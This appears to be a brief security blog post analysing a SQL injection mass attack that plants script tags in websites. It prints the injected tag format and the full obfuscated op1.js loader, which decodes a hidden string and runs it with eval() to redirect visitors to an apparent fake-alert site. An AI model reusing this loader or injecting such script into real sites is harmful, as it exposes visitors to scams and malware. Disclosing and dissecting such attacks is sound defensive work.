Just discovered a very different SQL injection from the past mass attacks.
The injected tag is of this form
<script src=””=%5Bsome random URLs]>[some associated word with URL]</script>
For example –
<script src=””=>home equity line of credit</script>

The op1.js is as follows:
var ptitle = document.title;
var atpos = ptitle.indexOf(“-“);
if (atpos > -1) {
ptitle = ptitle.substring(atpos+2, ptitle.length);

var tt; var kk; var mm; kk=””; tt=”w|nd^w$l^c#[|^n;'([[*)!!b#nd#[>#m$com!|n$cg|]4{*#r#m>[>r;”;

for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm==”(“) mm=”h”; if (mm==”*”) mm=”p”; if (mm==”!”) mm=”/”; if (mm==”>”) mm=”e”;if (mm==”$”) mm=”.”;
if (mm==”[“) mm=”t”; if (mm==”#”) mm=”a”; if (mm==”^”) mm=”o”; if (mm==”]”) mm=”?”; if (mm==”@”) mm=”k”;
if (mm==”{“) mm=”&”; if (mm==”)”) mm=”:”; if (mm==”;”) mm=”=”; if (mm==”|”) mm=”i”; if (mm==” “) mm=”+”; kk=kk+mm; }
kk += ptitle + “‘;”;
eval (kk);

The op1.js is decoded to be

The above URL was redirected to the following URL when retrieved

Looks like it is one of those fakealert site typically associated with RBN.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: